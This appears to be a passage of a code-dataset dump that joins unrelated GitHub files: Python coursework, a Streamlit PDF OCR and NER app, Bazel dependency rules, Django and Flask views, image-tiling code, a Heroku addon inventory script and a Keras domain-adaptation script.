to 0. \r\ndef replaceNegatives(values):\r\n    i = 0 \r\n    \r\n    #Loop through the indices, replacing any negative numbers with zeros\r\n    while i < len(values):\r\n        #body\r\n        if values[i] < 0:\r\n            values[i] = 0\r\n        \r\n        #update\r\n        i = i + 1\r\n    \r\n    return\r\n\r\n\r\n##Shifts all the elements one position to the right. Moves the last element to the first position.\r\ndef shiftRight(values):\r\n    #setup\r\n    i = (len(values) - 1)\r\n    if len(values) > 1:\r\n        lastValueHolder = values[-1] #Holds on to the last value so we can replace the first later\r\n    \r\n    while i >= 0:\r\n        #Body\r\n        if i > 0: #If I is still looping through\r\n            values[i] = values[i-1]\r\n        else: #If I has reached the end\r\n            values[0] = lastValueHolder #Replace the first index with the last we saved earlier\r\n        \r\n        #update\r\n        i = i - 1\r\n\r\n    #return\r\n    return\r\n","repo_name":"WillSchick/CS111-Coursework","sub_path":"lab9/listThings.py","file_name":"listThings.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"71604201387","text":"import spacy\r\nimport os\r\nfrom spacy.tokens import DocBin\r\nfrom pdf2image import convert_from_path\r\nimport pytesseract\r\nimport random\r\nimport streamlit as st \r\n\r\n# Load the spaCy model\r\nnlp = spacy.load(\"model-best\")\r\n\r\n# Function to convert PDF to images and save them in a folder\r\ndef pdf_to_images(pdf_file_path, output_folder):\r\n    images = convert_from_path(pdf_file_path)\r\n\r\n    for i, image in enumerate(images):\r\n        image_path = os.path.join(output_folder, f\"page_{i + 1}.jpg\")\r\n        image.save(image_path, \"JPEG\")\r\n\r\n    return images\r\n\r\n\r\ndef extract_named_entities(text):\r\n    \r\n\r\n    doc = nlp(text)\r\n    \r\n    entities = []\r\n    for ent in doc.ents:\r\n        # Get the confidence score from the Span object\r\n        \r\n        entities.append((ent.text, ent.label_.upper()))\r\n    return entities\r\n\r\n\r\ndef extract_text_from_image(img):\r\n    \r\n    return pytesseract.image_to_string(img)\r\n    \r\n\r\ndef save_uploaded_file(uploaded_file):\r\n    # Create a temporary directory to save the uploaded file\r\n    temp_dir = \"temp1\" # Replace with 
your desired temporary directory name\r\n if not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n # Save the uploaded file to the temporary directory\r\n file_path = os.path.join(temp_dir, uploaded_file.name)\r\n with open(file_path, \"wb\") as f:\r\n f.write(uploaded_file.getvalue())\r\n\r\n return file_path\r\n\r\ndef main():\r\n \r\n \r\n\r\n\r\n st.title(\"PDF Named Entity Recognition with spaCy\")\r\n\r\n uploaded_file = st.file_uploader(\"Upload a PDF file\", type=[\"pdf\"])\r\n\r\n \r\n if uploaded_file:\r\n # Save the uploaded PDF file and get the path of the saved file\r\n saved_file_path = save_uploaded_file(uploaded_file)\r\n # Save the uploaded file to a temporary folder\r\n \r\n temp_dir = os.path.abspath(\"temp\")\r\n if not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n # Save the uploaded file to the \"temp\" directory\r\n with open(os.path.join(temp_dir, uploaded_file.name), \"wb\") as f:\r\n f.write(uploaded_file.getvalue())\r\n\r\n # Get the file path of the uploaded PDF\r\n pdf_file_path = os.path.join(temp_dir, uploaded_file.name)\r\n\r\n output_folder = os.path.join(temp_dir, \"images\")\r\n if not os.path.exists(output_folder):\r\n os.makedirs(output_folder)\r\n\r\n images = pdf_to_images(os.path.join(\"temp\", uploaded_file.name), output_folder)\r\n if not os.path.exists(\"output\"):\r\n os.makedirs(\"output\")\r\n \r\n\r\n images = pdf_to_images(saved_file_path, \"output\")\r\n\r\n for i, image in enumerate(images):\r\n st.subheader(f\"Processing Page {i + 1}\")\r\n # Perform OCR on the image to extract text\r\n text= extract_text_from_image(image)\r\n \r\n # Perform NER on the extracted text to identify named entities\r\n # entities = extract_named_entities(text)\r\n \r\n # # Display named entities using spaCy displacy.render\r\n # html = spacy.displacy.render(entities, style=\"ent\", page=True, minify=True)\r\n # st.write(html, unsafe_allow_html=True)\r\n entities = extract_named_entities(text)\r\n\r\n # Display named entities using spaCy displacy.render\r\n html = spacy.displacy.render(nlp(text), style=\"ent\", page=True, minify=True)\r\n st.write(html, unsafe_allow_html=True)\r\n\r\n # Display the named entities list with confidence scores\r\n st.subheader(\"Named Entities with Confidence Scores:\")\r\n for entity_text, entity_label in entities:\r\n st.write(f\"{entity_text}: {entity_label} \")\r\n \r\n\r\n# Run the app\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Laxmikurapati/Named-Entity-Recognition-for-Aadhaar-Card-PDFs","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"134277708","text":"HERAKLES_CPP_COPTS = [\n \"-Wall\",\n \"-Wextra\",\n \"-Werror\",\n \"-pedantic\",\n \"-std=c++1z\",\n]\n\n# Use this in all C cc_library and cc_binary rules that are part of or depend\n# on Herakles.\nHERAKLES_C_COPTS = [\n \"-Wall\",\n \"-Wextra\",\n \"-Werror\",\n \"-pedantic\",\n \"-std=c11\",\n]\n\ndef herakles_repositories(omit_com_github_renatoutsch_rules_flatbuffers=False,\n omit_com_github_renatoutsch_rules_system=False,\n omit_com_github_renatoutsch_rules_spirv=False,\n omit_com_github_gflags_gflags=False,\n omit_com_github_gtruc_glm=False,\n omit_com_github_khronosgroup_vulkan_docs=False,\n omit_com_github_khronosgroup_vulkan_hpp=False,\n omit_com_github_nothings_stb=False,\n omit_com_google_glog=False,\n omit_com_google_googletest=False):\n \"\"\"Imports dependencies for 
Herakles.\"\"\"\n if not omit_com_github_renatoutsch_rules_flatbuffers:\n com_github_renatoutsch_rules_flatbuffers()\n if not omit_com_github_renatoutsch_rules_system:\n com_github_renatoutsch_rules_system()\n if not omit_com_github_renatoutsch_rules_spirv:\n com_github_renatoutsch_rules_spirv()\n if not omit_com_github_gflags_gflags:\n com_github_gflags_gflags()\n if not omit_com_github_gtruc_glm:\n com_github_gtruc_glm()\n if not omit_com_github_khronosgroup_vulkan_docs:\n com_github_khronosgroup_vulkan_docs()\n if not omit_com_github_khronosgroup_vulkan_hpp:\n com_github_khronosgroup_vulkan_hpp()\n if not omit_com_google_glog:\n com_google_glog()\n if not omit_com_google_googletest:\n com_google_googletest()\n if not omit_com_github_nothings_stb:\n com_github_nothings_stb()\n\ndef com_github_renatoutsch_rules_flatbuffers():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_flatbuffers\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_flatbuffers-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_flatbuffers/archive/master.zip\"],\n )\n\ndef com_github_renatoutsch_rules_system():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_system\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_system-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_system/archive/master.zip\"],\n )\n\ndef com_github_renatoutsch_rules_spirv():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_spirv\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_spirv-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_spirv/archive/master.zip\"],\n )\n\ndef com_github_gflags_gflags():\n native.http_archive(\n name = \"com_github_gflags_gflags\",\n sha256 = \"4e44b69e709c826734dbbbd5208f61888a2faf63f239d73d8ba0011b2dccc97a\",\n strip_prefix = \"gflags-2.2.1\",\n urls = [\"https://github.com/gflags/gflags/archive/v2.2.1.zip\"],\n )\n\ndef com_github_gtruc_glm():\n native.new_http_archive(\n name = \"com_github_gtruc_glm\",\n build_file = \"third_party/glm.BUILD\",\n sha256 = \"0b4c56d74618235ffe8d92f44ec7daef9506923c51762546df7ea4fc8e21face\",\n strip_prefix = \"glm-0.9.8.5\",\n urls = [\"https://github.com/g-truc/glm/archive/0.9.8.5.zip\"],\n )\n\ndef com_github_khronosgroup_vulkan_docs():\n native.new_http_archive(\n name = \"com_github_khronosgroup_vulkan_docs\",\n build_file = \"third_party/vulkan_docs.BUILD\",\n sha256 = \"9d0376c5df89e8a5ac7f945754f6135f9c779bdb38a1d99b416f2a2943e2c118\",\n strip_prefix = \"Vulkan-Docs-1.0.57-core\",\n urls = [\"https://github.com/KhronosGroup/Vulkan-Docs/archive/v1.0.57-core.zip\"],\n )\n\ndef com_github_khronosgroup_vulkan_hpp():\n native.new_http_archive(\n name = \"com_github_khronosgroup_vulkan_hpp\",\n build_file = \"third_party/vulkan_hpp.BUILD\",\n sha256 = \"719503f0dc4ea8b091aeb8aaaf487965d5dc8adea75c673861fd4d988b326391\",\n strip_prefix = \"Vulkan-Hpp-bca6564dac806ea8d30bad792066a3ba963fdbf1\",\n urls = [\"https://github.com/KhronosGroup/Vulkan-Hpp/archive/bca6564dac806ea8d30bad792066a3ba963fdbf1.zip\"],\n )\n\ndef com_github_nothings_stb():\n native.new_http_archive(\n name = \"com_github_nothings_stb\",\n build_file = \"third_party/stb/stb.BUILD\",\n sha256 = 
\"33e55ecfea2a78516a4fe42b92580ed45caceda26bdee3ac6c933c677c0965fa\",\n strip_prefix = \"stb-9d9f75eb682dd98b34de08bb5c489c6c561c9fa6\",\n urls = [\"https://github.com/nothings/stb/archive/9d9f75eb682dd98b34de08bb5c489c6c561c9fa6.zip\"],\n )\n\ndef com_google_glog():\n native.new_http_archive(\n name = \"com_google_glog\",\n build_file = \"third_party/glog.BUILD\",\n sha256 = \"267103f8a1e9578978aa1dc256001e6529ef593e5aea38193d31c2872ee025e8\",\n strip_prefix = \"glog-0.3.5\",\n urls = [\"https://github.com/google/glog/archive/v0.3.5.zip\"],\n )\n\ndef com_google_googletest():\n native.new_http_archive(\n name = \"com_google_googletest\",\n build_file = \"third_party/googletest.BUILD\",\n sha256 = \"f3ed3b58511efd272eb074a3a6d6fb79d7c2e6a0e374323d1e6bcbcc1ef141bf\",\n strip_prefix = \"googletest-release-1.8.0\",\n urls = [\"https://github.com/google/googletest/archive/release-1.8.0.zip\"],\n )\n","repo_name":"RenatoUtsch/herakles","sub_path":"herakles/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34768667770","text":"from django.shortcuts import render\nfrom . models import Document, Rating\nfrom django.db.models import F\n\n\n# Create your views here.\ndef ratesummary(request):\n if request.method == 'POST':\n aid = request.POST['aid']\n com = float(request.POST['com_score'])\n wr = float(request.POST['wr_score'])\n tr = float(request.POST['tr_score'])\n\n # update database and increment count\n status = Rating.objects.create(aid=aid, com_score=com, wr_score=wr, tr_score=tr)\n\n # update avg scores\n article = Document.objects.get(id=aid)\n av_com = float(article.avg_com)\n av_wr = float(article.avg_wr)\n av_tr = float(article.avg_tr)\n count = float(article.num_rating)\n\n av_com = ((av_com*count) + com )/(count+1)\n av_wr = ((av_wr*count) + wr )/(count+1)\n av_tr = ((av_tr*count) + tr )/(count+1)\n\n count = count + 1\n\n Document.objects.filter(id = aid).update(avg_com=av_com, avg_wr=av_wr, avg_tr=av_tr, num_rating=count)\n\n #counter, created = Document.objects.get_or_create(id = aid)\n #counter.num_rating = F('num_rating') + 1\n #counter.save()\n\n return render(request, 'ratesummary/ratesummary.html', {'info': 'thanks'})\n else:\n # get a non rated article\n articles = Document.objects.order_by('?')\n\n if not articles:\n return render(request, 'ratesummary/ratesummary.html', {'info': 'none'})\n else:\n article = articles.first()\n return render(request, 'ratesummary/ratesummary.html', {'article': article, 'info': 'fresh'})\n","repo_name":"kaykobad/ses","sub_path":"ratesummary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16786461684","text":"from flask import Flask, render_template, request # request modul notwendig, um URL Parameter zu übergeben\napp = Flask(__name__)\n\n# Klasse\nclass Location():\n def __init__(self, location, duration):\n self.location = location\n self.duration = duration # * 2 Hier könnte man Berechnungen machen\n\n\n@app.route(\"/\")\ndef start():\n title = \"Nice locations to visit\"\n greeting = \"Find your location of love!\"\n\n# Klasse\n places = [\n Location(\"Paris\", 2),\n Location(\"Stade\", 5),\n Location(\"Hamburg\", 1),\n Location(\"Praque\", 3)\n ]\n\n# Oder Dictionaries ohne Klasse\n# places = [\n# {\"location\": \"Paris\", \"duration\": 4},\n# {\"location\": \"Stade\", 
\"duration\": 10},\n# {\"location\": \"Hamburg\", \"duration\": 2},\n# {\"location\": \"Praque\", \"duration\": 6},\n# ]\n\n# Hier könnte man Berechnungen zu Dictionaries machen\n# for location in places:\n# location[\"duration\"] = location[\"duration\"] # * 2 Oder hier Berechnungen machen\n\n# Oder Tupel ohne Klasse\n# places = [\n# (\"Paris\", 8),\n# (\"Stade\", 20),\n# (\"Hamburg\", 4),\n# (\"Parque\", 12)\n# ]\n\n\n return render_template(\"start.html\",\n paragraph=greeting,\n location={\"location\": \"Barcelona\", \"duration\": 14},\n locations=places,\n title=title)\n\n\n@app.route(\"/locations\")\ndef locations():\n parameters = request.args\n location = parameters.get(\"location\")\n daytime = parameters.get(\"daytime\")\n days = parameters.get(\"days\")\n\n return render_template(\"locations.html\", location=location, daytime=daytime, days=days)\n","repo_name":"ViktorXs/learning-python","sub_path":"hauptuebungen/11_flask/09_eigene_klassen_und_dictionaries_weiterleiten/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74505951466","text":"# https://www.codewars.com/kata/5254ca2719453dcc0b00027d\n# 2023-03-11T12:12:22.763+0000\ndef permutations(s):\n if len(s) == 1:\n return [s]\n output_set = set()\n for i, letter in enumerate(s):\n for perm in permutations(s[:i] + s[i+1:]):\n output_set.add(letter + perm)\n return list(output_set)","repo_name":"Eatkin/codewars-solutions","sub_path":"Python/So_Many_Permutations-4_kyu.py","file_name":"So_Many_Permutations-4_kyu.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"811969315","text":"# Factorial of a number is the product of all the integers from 1 to that number.\n# 6! = 6*5*4*3*2*1 =720 (positve number)\n# Factorial is not defined for negative numbers\n# Factorial of zero is one ( 0! 
\n# Python program to find the factorial of a number provided by the user.\n\nnum = int(input(\"Enter a number: \"))\n\nfactorial = 1\n\n# check if the number is negative, positive or zero\nif num < 0:\n    print(\"Sorry, factorial does not exist for negative numbers\")\nelif num == 0:\n    print(\"The factorial of 0 is 1\")\nelse:\n    for i in range(1, num + 1):\n        factorial = factorial * i\n    print(f\"The factorial of {num} is {factorial}\")\n","repo_name":"Nikhil235/Python","sub_path":"Intoduction/Numbers/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"28952382111","text":"import os\nimport numpy as np\nimport cv2\nimport threading\nimport math\n\nFACES = ['nz', 'pz', 'px', 'nx', 'ny', 'py']\n\ndef sphere_to_cube(file_path, resolution=2048, format=\"hdr\", output=\"output\"):\n    # im = cv2.imread(file_path)\n    im = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), -1)\n    hsize = resolution / 2\n    pos_array = np.arange(0, resolution * resolution, 1)\n    axA_array = np.floor_divide(pos_array, resolution)\n    axB_array = np.fmod(pos_array, resolution)\n    output_cubes = []\n    tasks = []\n    for i in range(0, 5):\n        # output_cube = os.path.join(output, \"%s%s.%s\" % (\"sp_\", FACES[i], \"png\"))\n        # output_cubes.append(output_cube)\n        filename_with_extension = os.path.basename(file_path)\n        filename_without_extension = os.path.splitext(filename_with_extension)[0]\n        output_cube = os.path.join(output, filename_without_extension)\n        task = threading.Thread(target=sphere_to_cube_process,\n                                args=(im, i, axA_array, axB_array, resolution, hsize, format, output_cube),\n                                name=\"sphere_to_cube_\" + str(i))\n        task.start() # start the worker thread\n        tasks.append(task)\n    for task in tasks:\n        task.join()\n    return output_cubes\n\ndef sphere_to_cube_process(im, face_id, axA_array, axB_array, size, hsize, format, output_cube):\n    # nz\n    if FACES[face_id] == 'nz':\n        x_array = np.full(size * size, hsize)\n        y_array = - axB_array + np.full(size * size, hsize)\n        z_array = - axA_array + np.full(size * size, hsize)\n    # pz\n    elif FACES[face_id] == 'pz':\n        x_array = np.full(size * size, -hsize)\n        y_array = axB_array + np.full(size * size, -hsize)\n        z_array = - axA_array + np.full(size * size, hsize)\n    # px\n    elif FACES[face_id] == 'px':\n        x_array = axB_array + np.full(size * size, -hsize)\n        y_array = np.full(size * size, hsize)\n        z_array = - axA_array + np.full(size * size, hsize)\n    # nx\n    elif FACES[face_id] == 'nx':\n        x_array = - axB_array + np.full(size * size, hsize)\n        y_array = np.full(size * size, -hsize)\n        z_array = - axA_array + np.full(size * size, hsize)\n    # ny (bottom view)\n    elif FACES[face_id] == 'ny':\n        x_array = axB_array + np.full(size * size, -hsize)\n        y_array = -axA_array + np.full(size * size, hsize)\n        z_array = np.full(size * size, -hsize)\n\n    
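# Added note: convert each face pixel's XYZ ray to spherical angles (theta, phi), then index the equirectangular source image.\n    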
r_array = np.sqrt(x_array * x_array + y_array * y_array + z_array * z_array)\n    theta_array = np.arccos(z_array / r_array)\n    phi_array = -np.arctan2(y_array, x_array)\n    ix_array = np.floor_divide((im.shape[1] - 1) * phi_array, (2 * math.pi))\n    iy_array = np.floor_divide((im.shape[0] - 1) * (theta_array), math.pi)\n    ix_array = np.where(ix_array >= 0, ix_array, im.shape[1] + ix_array)\n    iy_array = np.where(iy_array >= 0, iy_array, im.shape[0] + iy_array)\n    index_array = iy_array * im.shape[1] + ix_array\n    reshape_array = im.reshape((im.shape[0] * im.shape[1], 3))\n    color_side = reshape_array[index_array.astype(int)]\n    color_side = color_side.reshape((size, size, 3))\n    clip_image(FACES[face_id], color_side, output_cube)\n\ndef clip_image(face, img, output_file):\n    \"\"\"\n    The bottom view ('ny') is cut into 2048*2048 tiles and scaled down to 1024*1024;\n    the other views are first cropped below row 3072, then clipped into 1024*1024 tiles.\n    \"\"\"\n    if face == 'ny':\n        img = np.rot90(img, 1)\n        width, height, _ = img.shape\n        size = 2048\n        re_size = 1024\n        # number of tiles needed to cover the input image\n        num_tiles_x = width // size\n        num_tiles_y = height // size\n        for x in range(num_tiles_x):\n            for y in range(num_tiles_y):\n                # compute the tile's coordinates\n                x_min = x * size\n                y_min = y * size\n                x_max = x_min + size\n                y_max = y_min + size\n                # crop the tile with OpenCV\n                save_file = f'{output_file}_{face}_{x_min}_{y_min}.png'\n                # save_file = os.path.join(output_file, \"_%s_%s_%s%s\" % (face, x_min, y_min, \".png\"))\n                color_side = cv2.resize(img[x_min:x_max, y_min:y_max],(re_size,re_size))\n                if (veg_extract(color_side) and Is_approximately_pure_color_image(color_side)):\n                    # cv2.imwrite(save_file, color_side)\n                    cv2.imencode('.jpg', color_side)[1].tofile(save_file)\n\n    # other views\n    else:\n        img = img[3072:, :]\n        width, height, _ = img.shape\n        size = 1024\n        # number of tiles needed to cover the input image\n        num_tiles_x = width // size\n        num_tiles_y = height // size\n        for x in range(num_tiles_x):\n            for y in range(num_tiles_y):\n                # compute the tile's coordinates\n                x_min = x * size\n                y_min = y * size\n                x_max = x_min + size\n                y_max = y_min + size\n                # crop the tile with OpenCV\n                save_file = f'{output_file}_{face}_{x_min}_{y_min}.png'\n                # save_file = os.path.join(output_file, \"_%s_%s_%s%s\" % (face, x_min, y_min, \".png\"))\n                color_side = cv2.resize(img[x_min:x_max, y_min:y_max],(size,size), interpolation=cv2.INTER_AREA)\n                if (veg_extract(color_side) and Is_approximately_pure_color_image(color_side)):\n                    # cv2.imwrite(save_file, color_side)\n                    cv2.imencode('.jpg', color_side)[1].tofile(save_file) # tofile() handles non-ASCII (Chinese) paths\n\ndef pitch_process_clip(input_folder_path, output_folder_path):\n    file_list = os.listdir(input_folder_path)\n    # process every file in the folder\n    for file_name in file_list:\n        file_extension = file_name.split('.')[-1]\n        if file_extension.lower() == 'jpg':\n            file_path = os.path.join(input_folder_path, file_name)\n            os.makedirs(output_folder_path, exist_ok=True)\n            sphere_to_cube(file_path, resolution=4096, format=\"JPG\", output=output_folder_path)\n\ndef veg_extract(img):\n    B, G, R = cv2.split(img)\n    # compute the vegetation index\n    # cive = 0.441 * R - 0.811 * G + 0.385 * B + 18.78745\n    cive = 2.4 * G - B - R\n    gray = cive.astype('uint8')\n    # Apply thresholding to the image\n    ret, thresh = cv2.threshold(gray, 0, 1, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n    # Calculate the percentage of white pixels in the image\n    white_pixels = np.sum(thresh == 1)\n    total_pixels = img.shape[0] * img.shape[1]\n    percentage_white = (white_pixels / total_pixels) * 100\n    if percentage_white > 30:\n        return True\n    else:\n        return False\n\ndef Is_approximately_pure_color_image(image, threshold=20):\n    # convert the color image to grayscale\n    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    mean_value = np.mean(gray_image)\n    # difference between each pixel and the mean pixel value\n    pixel_diff = np.abs(gray_image - mean_value)\n    # standard deviation (or mean absolute difference) of the differences\n    diff_std = np.std(pixel_diff)\n    # decide whether the image is approximately a solid color\n    if diff_std >= threshold:\n        return True\n    else:\n        return False\n\n\nif __name__ == '__main__':\n    file_path = r'E:\\project\\高明区全景识别\\data\\1008高明查违\\第四期\\100MEDIA'\n    out_dir = r'E:\\project\\高明区全景识别\\data\\img_1024_4'\n\n    pitch_process_clip(file_path, out_dir)\n","repo_name":"loki-keroro/CropUnet","sub_path":"utils/sphere_clip_wp.py","file_name":"sphere_clip_wp.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"36027778820","text":"#!/usr/bin/env 
python3\n\nimport csv\nimport fileinput\nimport re\nimport subprocess\nimport sys\n\n\noutfile = csv.writer(sys.stdout)\n\nheaders = [\"app\", \"addon\", \"plan\", \"price\"] \noutfile.writerow(headers)\n\nfor app in fileinput.input():\n    app = app.strip()\n    sys.stderr.write(\"Querying for (%s)\\n\" % (app,))\n    completed = subprocess.run(['heroku', 'addons', '-a', app], stdout=subprocess.PIPE)\n    output_lines = completed.stdout.decode(\"utf-8\").split('\\n')\n    for addon in output_lines:\n        if \"created\" not in addon:\n            continue\n        # fields = [addon, plan, price, status]\n        fields = [f.strip() for f in re.split(r\" +\", addon)]\n        # process price\n        if fields[2] == \"free\":\n            fields[2] = 0\n        elif \"billed to\" in fields[2]:\n            continue\n        else:\n            price_match = re.match(r\"\\$(\\d+)/month\", fields[2])\n            fields[2] = int(price_match.groups()[0])\n        # strip addon ID\n        fields[0] = fields[0].split(\" \")[0]\n        outfile.writerow([app] + fields[:3])\n","repo_name":"erjiang/heroku_inventory","sub_path":"heroku_inventory.py","file_name":"heroku_inventory.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"24770128756","text":"from sklearn.model_selection import train_test_split\nimport pyarrow.parquet as pq\nimport pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import r2_score\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dense, Lambda, Dropout\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.losses import mean_squared_error, binary_crossentropy\nfrom tensorflow.keras.optimizers import Adam\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# Load and preprocess the dataset\ncell_df = pq.read_table(source='cellular_dataframe.parquet').to_pandas()\nfiltered_data = cell_df.query(\"direction == 'downlink' & measured_qos == 'datarate'\")\nfiltered_data = filtered_data.dropna(subset = 'datarate')\n\ntrain_data = filtered_data.query(\"operator == 1\")\ntest_data = filtered_data.query(\"operator == 2\")\n\n# Select the chosen features\nqos_column = 'datarate'\n\n\nselected_features = [\n    \n    'PCell_RSRP_max',\n    'PCell_RSRQ_max',\n    'PCell_RSSI_max',\n    'PCell_SNR_1',\n    'PCell_SNR_2',\n    'PCell_Downlink_Num_RBs',\n    'PCell_Downlink_TB_Size',\n    'PCell_Downlink_Average_MCS',\n    'SCell_RSRP_max',\n    'SCell_RSRQ_max',\n    'SCell_RSSI_max',\n    'SCell_SNR_1',\n    'SCell_SNR_2',\n    'SCell_Downlink_Num_RBs',\n    'SCell_Downlink_TB_Size',\n    'SCell_Downlink_Average_MCS',\n    'Traffic Jam Factor'\n]\n\nx_train_source, y_train_source = train_data[selected_features], train_data[qos_column]\nx_test_target, y_test_target = test_data[selected_features], test_data[qos_column]\n\n\nimputer = SimpleImputer(strategy='mean')\nx_train_source = imputer.fit_transform(x_train_source)\nx_test_target = imputer.transform(x_test_target)\n\nsource_domain_labels = np.zeros(x_train_source.shape[0])\ntarget_domain_labels = np.ones(x_test_target.shape[0])\ndomain_labels = np.concatenate((source_domain_labels, target_domain_labels))\n\ncombined_data = np.concatenate((x_train_source, x_test_target))\n\ninput_layer = Input(shape=(x_train_source.shape[1],))\n\nfeature_extractor_hidden = Dense(100, activation='relu')(input_layer)\nshared_features = Dense(100, activation='relu')(feature_extractor_hidden)\nregression_hidden = Dense(100, activation='relu')(shared_features)\nregression_output = 
Dense(1)(regression_hidden)\ndomain_hidden = Dense(100, activation='relu')(shared_features)\ndomain_output = Dense(1, activation='sigmoid')(domain_hidden)\n\nregression_model = Model(inputs=input_layer, outputs=regression_output)\ncombined_model = Model(inputs=input_layer, outputs=[regression_output, domain_output])\n\n# Create gradient reversal layer\ndef grad_reverse(x):\n return -1.0 * x\n\ngradient_reversal_layer = Lambda(grad_reverse)\n\ndomain_adversarial_output = gradient_reversal_layer(domain_output)\n\ncombined_model.compile(\n optimizer=Adam(learning_rate=0.05),\n loss=['mean_squared_error', 'binary_crossentropy'],\n loss_weights=[1.0, 1.0]\n)\n\nx_train_source_mean = x_train_source.mean()\nx_train_source_std = x_train_source.std()\nx_train_source_normalized = (x_train_source - x_train_source_mean) / x_train_source_std\nx_test_target_normalized = (x_test_target - x_train_source_mean) / x_train_source_std\ny_train_source_mean = y_train_source.mean()\ny_train_source_std = y_train_source.std()\ny_train_source_normalized = (y_train_source - y_train_source_mean) / y_train_source_std\n\ncombined_model.fit(\n x_train_source_normalized,\n [y_train_source_normalized, source_domain_labels],\n epochs=64,\n batch_size=32\n)\n\ny_pred_target_normalized, _ = combined_model.predict(x_test_target_normalized)\n\ny_pred_target = (y_pred_target_normalized * y_train_source_std) + y_train_source_mean\n\nr2_target = r2_score(y_test_target, y_pred_target)\n\nprint(\"R2 Score on Target Domain:\", r2_target)\n\n\n# input_layer = Input(shape=(x_train_source.shape[1],))\n\n# feature_extractor_hidden = Dense(100, activation='relu')(input_layer)\n# shared_features = Dense(100, activation='relu')(feature_extractor_hidden)\n# regression_hidden = Dense(100, activation='relu')(shared_features)\n# regression_output = Dense(1)(regression_hidden)\n# domain_hidden = Dense(100, activation='relu')(shared_features)\n# domain_output = Dense(1, activation='sigmoid')(domain_hidden)\n\n# regression_model = Model(inputs=input_layer, outputs=regression_output)\n# combined_model = Model(inputs=input_layer, outputs=[regression_output, domain_output])\n\n# def grad_reverse(x):\n# return -1.0 * x\n\n# gradient_reversal_layer = Lambda(grad_reverse)\n# reversed_domain_output = gradient_reversal_layer(domain_hidden)\n# domain_adversarial_output = Dense(1, activation='sigmoid')(reversed_domain_output)\n\n# domain_adversarial_model = Model(inputs=input_layer, outputs=domain_adversarial_output)\n\n# combined_model.compile(\n# optimizer=Adam(learning_rate=0.05),\n# loss=['mean_squared_error', 'binary_crossentropy'],\n# loss_weights=[1.0, 1.0]\n# )\n\n# domain_adversarial_model.compile(\n# optimizer=Adam(learning_rate=0.05),\n# loss='binary_crossentropy'\n# )\n\n# x_train_source_mean = x_train_source.mean()\n# x_train_source_std = x_train_source.std()\n# y_train_source_mean = y_train_source.mean()\n# y_train_source_std = y_train_source.std()\n# x_train_source_normalized = (x_train_source - x_train_source_mean) / x_train_source_std\n# x_test_target_normalized = (x_test_target - x_train_source_mean) / x_train_source_std\n# y_train_source_normalized = (y_train_source - y_train_source_mean) / y_train_source_std\n\n# combined_model.fit(\n# x_train_source_normalized,\n# [y_train_source_normalized, source_domain_labels],\n# epochs=64,\n# batch_size=32\n# )\n\n# domain_adversarial_model.fit(\n# combined_data,\n# domain_labels,\n# epochs=64,\n# batch_size=32\n# )\n\n# y_pred_target_normalized, _ = 
